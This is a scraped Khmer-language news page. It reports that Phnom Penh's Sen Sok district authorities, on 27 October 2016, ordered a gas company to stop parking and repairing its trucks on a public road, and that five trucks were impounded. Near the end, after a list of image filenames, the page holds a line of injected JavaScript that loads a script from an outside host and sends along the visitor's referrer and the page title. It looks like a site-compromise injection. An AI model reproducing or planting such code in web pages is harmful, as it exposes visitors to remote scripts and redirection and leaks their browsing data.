Leng Navatra – Sidebar Out Left
Leng Navatra – Banner Out Right

ក្រុមហ៊ុន ហ្គាស ថូ គីម ស្រ៊ាង យកផ្លូវជាចំណត និងជួសជុលរថយន្ត ត្រូវអភិបាលខណ្ឌសែនសុខ បញ្ជាអោយរើចេញជាបន្ទាន់

ភ្នំពេញ ៖ ក្រុមហ៊ុន ហ្គាស ថូ គីម ស្រ៊ាង យករថយន្តមកចតរំលោភលើផ្លូវ ត្រូវអាជ្ញាធរខណ្ឌសែនសុខចុះណែនាំ និងអប់រំនាព្រឹកថ្ងៃទី ២៧ ខែ តុលា ឆ្នាំ ២០១៦។តាមសេចក្តីរាយការណ៍ពីសំណាក់ប្រជាពលរដ្ឋថា ជារៀងរាល់ថ្ងៃ គេឃើញរថយន្តធនធំៗរបស់ក្រុមហ៊ុនហ្គាស ថូ គីម ស្រ៊ាង ជាច្រើនគ្រឿងបានយកកំណាត់ផ្លូវសំខាន់់ៗមួយកន្លែងនៅចំណុចភូមិត្រពាំងស្វាយ សង្កាត់ភ្នំពេញថ្មី ខណ្ឌ សែនសុខជាចំណត និងជួសជុលរថយន្តដែលខូចយ៉ាងអនាធិបតេយ្យ ហាក់មិនខ្លាចញញឺតអាជ្ញាធរដែនដី សោះ ទោះបីជាមានការណែនាំច្រើនលើកច្រើនសារក៍ដោយ។  ទើបព្រឹកម៉ិញនេះ លោក បុឹល កុសល អភិបាលខណ្ឌសែនសុខ បានបញ្ជាមន្ត្រីក្រោមឪវ៉ាទ ចុះធ្វើសេចក្តីដែលនាំ និងកិច្ចសន្យាជាក់លាក់មួយ។

ដោយឡែក នៅព្រឹកម៉ិញនេះផងដែរ ខាងសណ្តាប់ធ្នាប់ខណ្ឌក្រោមការបញ្ជាផ្ទាល់ពីលោកអភិបាល ក៍បានចុះរៀបចំផ្លូវសម្តេចជាសីុម ក្នុងនោះ បានឃាត់រថយន្តដឹកទំនិញ៥ គ្រឿងទៅរក្សាទុកនៅមូលដ្ឋានអាវុធហត្ថខណ្ឌ សែនសុខ ដើម្បីរងចាំតំណាងភាគីក្រុមហ៊ុនចូលខ្លួនមកដោះស្រាយ និងធ្វើកិច្ចសន្យាបញ្ឍប់រាល់់ការយកផ្លូវជាចំណត និងធ្វើអាជីវកម្ម។

10580145_597959533656979_673962016865262019_n10556410_597960570323542_6836460862162302117_n07d3bb57-80cf-47f8-b46b-059108316220 926b3f96-5fbd-4c2d-86b8-5a4ae4b3385f 9812ba94-476b-4a07-9f3d-4d21fd5b81ba 304017e7-627e-4f99-9bd2-4a9f259e33cd e8d92805-a7be-40c9-8367-f5b3664889f0 fe2d714c-8a3f-4c6b-820e-644649eb203c fe9d08d5-d96c-4e70-867d-28fcbbc2b52b fe88f6c1-db0d-4a79-b8cf-9d74f1551dde ffb587dc-7cbe-4dcc-9776-a0690775d668

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More